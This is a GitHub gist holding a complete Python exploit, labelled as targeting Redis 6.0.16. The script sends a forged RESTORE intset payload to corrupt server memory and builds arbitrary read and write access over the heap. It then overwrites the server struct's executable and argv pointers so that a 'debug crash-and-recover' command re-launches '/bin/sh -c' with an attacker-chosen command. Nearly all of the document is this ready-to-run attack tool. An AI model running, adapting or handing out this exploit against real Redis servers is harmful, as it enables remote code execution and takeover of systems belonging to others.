Skip to content

Instantly share code, notes, and snippets.

@neex

neex/exploit.py Secret

Created January 14, 2023 19:05
Show Gist options
  • Save neex/57a81b6b916cde812a5d0586c5bb42ee to your computer and use it in GitHub Desktop.
Save neex/57a81b6b916cde812a5d0586c5bb42ee to your computer and use it in GitHub Desktop.
exploit for redis 6.0.16
from pwn import *
import argparse
PAYLOAD = "echo pwned | tee /tmp/pwned"
def crc64(data: bytes):
poly = 0xad93d23594c935a9
crc = 0
for d in data:
for p in range(8):
bit = ((crc & (1 << 63)) >> 63) ^ ((d >> p) & 1)
crc = (crc << 1) & ((1 << 64) - 1)
if bit:
crc ^= poly
rev = 0
for i in range(64):
rev |= ((crc & (1 << i)) >> i) << (63 - i)
return rev
def serialize(args):
arr = [f"*{len(args)}\r\n".encode()]
for d in args:
if isinstance(d, int):
d = str(d)
if isinstance(d, str):
d = d.encode()
arr.append(f"${len(d)}\r\n".encode())
arr.append(d)
arr.append(b"\r\n")
return b"".join(arr)
def read_reply(r):
status = r.recvline()
if status[:1] == b"+":
return True, status
if status[:1] == b"-":
return False, status
if status[:1] == b":":
return int(status[1:].strip().decode())
if status[:1] == b"*":
count_items = int(status[1:].strip())
if count_items == -1:
return None
items = []
for i in range(count_items):
items.append(read_reply(r))
return items
if status[:1] == b"$":
length = int(status[1:].strip())
if length == -1:
return None
data = r.recvn(length)
r.recvn(2) # \r\n
return data
raise ValueError(f"Unexpected reply: {status}")
buffered_reply_count = 0
def send_no_reply(r, args):
global buffered_reply_count
r.send(serialize(args))
buffered_reply_count += 1
def send(r, args):
global buffered_reply_count
r.send(serialize(args))
for _ in range(buffered_reply_count):
read_reply(r) # ignored reply
buffered_reply_count = 0
return read_reply(r)
def get_buffered_replies(r, count=-1):
global buffered_reply_count
replies = []
for _ in range(buffered_reply_count):
replies.append(read_reply(r))
buffered_reply_count = 0
if count >= 0:
if len(replies) < count:
raise ValueError(f"Expected {count} replies, got {len(replies)}")
replies = replies[-count:]
return replies
def add_checksum(data):
data = data + b"\x09\x00"
crc = crc64(data)
return data + crc.to_bytes(8, "little")
def gen_length_payload(l):
buf = []
buf.append(b"\x80") # 32 bit length
buf.append(struct.pack(">I", l))
return b"".join(buf)
def gen_string_payload(data):
buf = []
buf.append(gen_length_payload(len(data)))
buf.append(data)
return b"".join(buf)
def get_rand_key(prefix, length=30):
if prefix:
prefix += '#'
assert len(prefix) < length - 8
return prefix + ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(length - len(prefix))])
def is_redis_binary_address(addr):
return 0x550000000000 < addr < 0x570000000000
def is_jemalloc_heap_addr(addr):
return 0x7e0000000000 < addr < 0x800000000000
def gen_intset_payload():
buf = []
buf.append(b"\x0b") # intset
s = []
s.append(b"\x04\x00\x00\x00") # INTSET_ENC_INT32
s.append(b"\x00\x01\x00\x00")
s.append(
b"\x00\x00\x00\x80" * 60,
)
buf.append(gen_string_payload(b"".join(s)))
return b"".join(buf)
current_elda_addr = None
elda_size_cache = {}
def setup_elda_memview_once(addr, ignore_cache=False):
global elda_key, elda_offset, memview_key, current_elda_addr, elda_size_cache
if (ignore_cache and addr != current_elda_addr) or addr not in elda_size_cache:
send_no_reply(r, ["SETRANGE", memview_key, elda_offset - 8 - 3, struct.pack("<Q", addr)])
current_elda_addr = addr
if addr not in elda_size_cache:
l = send(r, ["STRLEN", elda_key])
elda_size_cache[addr] = l
return elda_size_cache[addr]
def setup_elda_memview(addr, size, limit_tries=-1):
global elda_size_cache
good_offset = None
print(f"Searching for offset to view {addr:x}-{addr + size:x}")
for candidate_addr in elda_size_cache:
if candidate_addr <= addr and \
candidate_addr + elda_size_cache[candidate_addr] >= addr + size:
good_offset = addr - candidate_addr
print(f"Found cached {candidate_addr:x}-{candidate_addr + elda_size_cache[candidate_addr]:x} for {addr:x}-{addr + size:x}")
break
if good_offset is None:
offset = 0
while True:
if limit_tries == 0:
print(f"Failed to find offset to view {addr:x}-{addr + size:x}")
return None
limit_tries -= 1
l = setup_elda_memview_once(addr - offset)
print(f"Trying {addr - offset:x}-{addr - offset + l:x}")
if l >= size + offset:
good_offset = offset
break
offset += 1
setup_elda_memview_once(addr - good_offset, ignore_cache=True)
return good_offset
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Redis exploit")
parser.add_argument("host", type=str, help="Redis host")
parser.add_argument("port", type=int, help="Redis port")
args = parser.parse_args()
r = remote(args.host, args.port)
send_no_reply(r, ["flushdb"])
send_no_reply(r, ["multi"])
el_count = 0x10
for i in range(el_count):
ending = f"yaitsa{i}".encode() + b"\xff" * 14 + b"\7f" + b"\xff"
send_no_reply(r, ["setrange", f"pizda{i}", 252 - len(ending), ending])
send_no_reply(r, ["setrange", f"pizda{i}", 0, b"\xff\xff\x7f\x04" + f"golovka{i}".encode()])
if i == el_count // 2:
send_no_reply(r, ["RESTORE", "hueset", "0", add_checksum(gen_intset_payload())])
send_no_reply(r, ["exec"])
members = send(r, ["SMEMBERS", "hueset"])
data = b''.join(struct.pack("<i", int(m.decode())) for m in members)
key_idx = el_count // 2 + 2
assert f"golovka{key_idx}".encode() in data
send_no_reply(r, ["SREM", "hueset", -2 ** 31])
memview_key = f"pizda{key_idx}"
memview_length = send(r, ["strlen", memview_key])
print(f"Memview length is {memview_length}")
assert memview_length > 2 ** 32
keys = send(r, ["keys", "*"])
for k in keys:
if k != memview_key.encode():
send_no_reply(r, ["del", k])
candidate_count = 10000
send_no_reply(r, ["EVAL", f'for i = 0, {candidate_count}, 1 do '
' redis.call("set", "elda" .. i, "0.123456789123456789");'
' redis.call("incrbyfloat", "elda" .. i, i + 1); '
'end', "0", "0"])
position = 0
step = 0x10000
elda_id, elda_offset = None, None
some_binary_address = None
while True:
portion = send(r, ["getrange", memview_key, position, position + step])
print(f"Searching for elda: {position} - {position + step}")
start_pos = position
position += step - 100
portion += b"\x00"
for index in range(len(portion)):
if elda_id is not None:
break
candidate_elda_id = 0
pp = index
while ord('0') <= portion[pp] <= ord('9'):
candidate_elda_id = candidate_elda_id * 10 + (portion[pp] - ord('0'))
pp += 1
if candidate_elda_id <= 0 or portion[pp:pp + 7] != b".123456":
continue
elda_id = candidate_elda_id - 1
elda_offset = start_pos + index
print(f"Found elda id {elda_id} at {elda_offset} offset: {portion[index:index + 20]}")
for index in range(len(portion)):
if some_binary_address is not None:
break
candidate = portion[index:index + 8]
candidate_addr = struct.unpack("<Q", candidate)[0]
if is_redis_binary_address(candidate_addr) and \
candidate_addr & 0xffffff != 4:
some_binary_address = candidate_addr
print(f"Found binary address: {hex(candidate_addr)}")
if elda_id is not None and some_binary_address is not None:
break
assert elda_id is not None
elda_key = f"elda{elda_id}"
old_value = send(r, ["get", elda_key])
print(f"Old value is {old_value}")
send(r, ["setrange", memview_key, elda_offset, b"pizda"])
new_value = send(r, ["get", elda_key])
print(f"New value is {new_value}")
assert new_value != old_value, "Value is not changed"
robj_offset = elda_offset - 19
robj = send(r, ["getrange", memview_key, robj_offset, robj_offset + 0x100])
print(f"Robj is {robj}")
send(r, ["setrange", memview_key, robj_offset, b"\x00"])
elda_addr = struct.unpack("<Q", robj[8:16])[0]
print(f"Elda address is {elda_addr:x}")
memview_addr = elda_addr - elda_offset
print(f"Memview address is {memview_addr:x}")
assert setup_elda_memview_once(memview_addr, ignore_cache=True) == memview_length
print(f"Some binary address is {some_binary_address:x}")
print(f"Searching for server struct")
search_addr = some_binary_address
server_struct = None
server_struct_search_step = 0x10000
while True:
this_start = search_addr
search_addr += server_struct_search_step - 100
offset = setup_elda_memview(this_start, server_struct_search_step)
data = send(r, ["getrange", elda_key, offset, offset + server_struct_search_step])
for i in range(len(data)):
server_struct_contents = data[i:i + 40]
if len(server_struct_contents) < 40:
continue
config, executable, argv, junk1, junk2 = struct.unpack("<QQQQQ", server_struct_contents)
if (is_jemalloc_heap_addr(config) or config == 0) and\
is_jemalloc_heap_addr(executable) and\
is_jemalloc_heap_addr(argv) and \
not is_jemalloc_heap_addr(junk1) and \
not is_jemalloc_heap_addr(junk2):
server_struct_candidate = this_start + i
print(f"Server struct may be at {server_struct_candidate:x}")
executable_offset = setup_elda_memview(executable, 0x30, limit_tries=200)
if executable_offset is None:
print(f"Memview for the executable addr {executable:x} is not found")
continue
executable_data = send(r, ["getrange", elda_key, executable_offset, executable_offset + 0x30])
print(f"Executable data is {executable_data}")
if not b"/redis-server" in executable_data:
continue
server_struct = server_struct_candidate
print(f"Found server struct at {server_struct:x}")
break
if server_struct is not None:
break
print(f"Found server struct at {server_struct:x}")
additional_args = ["/bin/sh",
"-c",
PAYLOAD]
arg_param_data = bytearray(b'\x00' * ((len(additional_args) + 1) * 8))
additional_arg_offsets = []
for a in additional_args:
additional_arg_offsets.append(len(arg_param_data))
arg_param_data.extend(a.encode() + b'\x00')
arg_param_data = bytes(arg_param_data)
print("Additional arg offsets:", additional_arg_offsets)
arg_key = get_rand_key("fake_args", 32)
send_no_reply(r, ["SET", arg_key, arg_param_data])
_, debug_info = send(r, ["DEBUG", "OBJECT", arg_key])
print(f"Debug info: {debug_info}")
value_at_addr = int(debug_info.split(b' ')[1].split(b':')[1].decode()[2:], 16)
print(f"Value at addr: {value_at_addr=:x}")
real_string_offset = setup_elda_memview(value_at_addr + 8, 8)
real_string_addr_data = send(r, ["getrange", elda_key, real_string_offset, real_string_offset + 7])
print(f"Real string addr data: {real_string_addr_data}")
real_string_addr = struct.unpack("<Q", real_string_addr_data)[0]
print(f"Real string addr: {real_string_addr=:x}")
for i, offset in enumerate(additional_arg_offsets):
send_no_reply(r, ["SETRANGE", arg_key, i * 8, struct.pack("<Q", real_string_addr + offset)])
server_offset = setup_elda_memview(server_struct, 0x30)
assert send(r, ["PING"])[0] is True, "ping failed"
send(r, ["SETRANGE", elda_key, server_offset + 8, struct.pack("<Q", real_string_addr + additional_arg_offsets[0])])
send(r, ["SETRANGE", elda_key, server_offset + 16, struct.pack("<Q", real_string_addr)])
assert send(r, ["PING"])[0] is True, "pre-restart ping failed"
print("Restarting server, cross fingers...")
send_no_reply(r, ["debug", "crash-and-recover"])
r.close()
print("The attack should have worked")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment